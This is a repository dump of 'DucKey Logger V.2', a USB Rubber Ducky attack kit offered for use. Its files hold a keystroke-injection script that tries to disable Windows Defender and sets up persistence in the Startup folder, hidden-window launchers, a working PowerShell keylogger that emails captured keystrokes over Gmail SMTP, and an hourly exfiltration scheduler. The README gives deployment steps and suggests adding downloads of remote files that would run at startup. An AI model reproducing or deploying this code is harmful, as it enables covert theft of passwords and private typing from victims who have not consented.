├── LICENSE ├── README.md ├── c.cmd ├── l.ps1 ├── p.ps1 └── payload.txt /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DucKey Logger V.2 2 | > Chris Taylor [Blue Cosmo] | 08/24/21 3 | --- 4 | 5 | ``` 6 | ::::::::: ::: ::: :::::::: ::: ::: :::::::::: ::: ::: 7 | :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: 8 | +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ 9 | +#+ +:+ +#+ +:+ +#+ +#++:++ +#++:++# +#++: 10 | +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ 11 | #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# 12 | ######### ######## ######## ### ### ########## ### 13 | ``` 14 | 15 | ## Update: 16 | **An New Version of This Payload Is Available [HERE](https://github.com/CosmodiumCS/DucKeyhook)** 17 | 18 | ## Overview: 19 | ``` 20 | DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes 21 | ``` 22 | - moves *c.cmd* file to windows startup directory 23 | - *c.cmd* will secretly run *p.ps1* 24 | - *p.ps1* will log keystrokes 25 | - *l.ps1* will email the logs every startup and every hour [via SMTP] 26 | - sends logs hourly, regardless of system time 27 | 28 | ## Resources: 29 | - [YouTube Video](https://www.youtube.com/watch?v=uHIZZYFeVJA) 30 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 31 | - [Website](https://cosmodiumcs.com) 32 | 33 | ## Requirements: 34 | - Twin-Duck firmware 35 | - Gmail account 36 | - i suggest making a separate Gmail account for this payload 37 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 38 | - Windows 10 Target 39 | 40 | ## Instructions: 41 | Set-Up/Installation 42 | 1. change Gmail credentials in *p.ps1* 43 | ```powershell 44 | # gmail credentials 45 | $email = "example@gmail.com" 46 | $password = "password" 47 | ``` 48 | 2. in line 20 of *payload.txt*, change 'L' to the name of your ducky [SD Card] 49 | ```powershell 50 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 51 | ``` 52 | 3. flash Twin-Duck firmware on to your duck 53 | - [Tutorial](https://www.youtube.com/watch?v=BzYH-BPHLpE) 54 | 4. load, encode, and deploy!! 55 | 56 | ## Extraneous: 57 | The *c.cmd* attack opportunity 58 | ``` 59 | the c.cmd file runs every startup. 60 | this means an attacker could place a 61 | 'wget' or 'Invoke-WebRequest' and have a file 62 | be downloaded from anywhere on the internet onto the computer. 63 | the file would then save in the startup directory, 64 | allowing it to run every startup 65 | ``` 66 | --- 67 | - hope you enjoy the payload!! 68 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 69 | -------------------------------------------------------------------------------- /c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 3 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/l.ps1" -------------------------------------------------------------------------------- /l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | # times logs will be sent [keep in military time] 5 | $logTimes = @( 6 | '00:00:00', 7 | '01:00:00', 8 | '02:00:00', 9 | '03:00:00', 10 | '04:00:00', 11 | '05:00:00', 12 | '06:00:00', 13 | '07:00:00', 14 | '08:00:00', 15 | '09:00:00', 16 | '10:00:00', 17 | '11:00:00', 18 | '12:00:00', 19 | '13:00:00', 20 | '14:00:00', 21 | '15:00:00', 22 | '16:00:00', 23 | '17:00:00', 24 | '18:00:00', 25 | '19:00:00', 26 | '20:00:00', 27 | '21:00:00', 28 | '22:00:00', 29 | '23:00:00' 30 | ) 31 | 32 | # sort the times in chronological order 33 | $logTimes = $logTimes | Sort-Object 34 | 35 | # ensure keylogger runs every day 36 | while ($true) { 37 | 38 | # run keylogger for each trigger time 39 | foreach ($t in $logTimes) 40 | { 41 | # checks if time passed already 42 | if((Get-Date) -lt (Get-Date -Date $t)) 43 | { 44 | # sleeps until next time is reached 45 | while ((Get-Date -Date $t) -gt (Get-Date)) 46 | { 47 | # sleeps 48 | (Get-Date -Date $t) - (Get-Date) | Start-Sleep 49 | } 50 | 51 | # runs keylogger 52 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # keylogger 9 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 10 | 11 | # email process 12 | $logs = Get-Content "$logFile" 13 | $subject = "$env:UserName logs" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $logs); 18 | 19 | # generate log file 20 | $generateLog = New-Item -Path $logFile -ItemType File -Force 21 | 22 | # API signatures 23 | $APIsignatures = @' 24 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 25 | public static extern short GetAsyncKeyState(int virtualKeyCode); 26 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 27 | public static extern int GetKeyboardState(byte[] keystate); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int MapVirtualKey(uint uCode, int uMapType); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 32 | '@ 33 | 34 | # set up API 35 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 36 | 37 | # attempt to log keystrokes 38 | try { 39 | while ($true) { 40 | Start-Sleep -Milliseconds 40 41 | 42 | for ($ascii = 9; $ascii -le 254; $ascii++) { 43 | 44 | # use API to get key state 45 | $keystate = $API::GetAsyncKeyState($ascii) 46 | 47 | # use API to detect keystroke 48 | if ($keystate -eq -32767) { 49 | $null = [console]::CapsLock 50 | 51 | # map virtual key 52 | $mapKey = $API::MapVirtualKey($ascii, 3) 53 | 54 | # create a stringbuilder 55 | $keyboardState = New-Object Byte[] 256 56 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 57 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 58 | 59 | # translate virtual key 60 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 61 | # add logged key to file 62 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | # send logs if code fails 70 | finally { 71 | # send email 72 | $smtp.Send($email, $email, $subject, $logs); 73 | } 74 | } 75 | 76 | # run keylogger 77 | KeyLogger -------------------------------------------------------------------------------- /payload.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE2 14 | REM attempts to disable defender 15 | STRING Set-MpPreference -DisableRealtimeMonitoring $true; 16 | 17 | REM STAGE 3 18 | REM move files to appropiate directories 19 | REM change 'L' to the name of your ducky 20 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 21 | ENTER 22 | DELAY 200 23 | 24 | REM comment out the option you decide NOT to use 25 | 26 | REM STAGE 4 27 | REM run keylogger 28 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 29 | 30 | REM STAGE 5 31 | REM deploy 32 | ENTER 33 | --------------------------------------------------------------------------------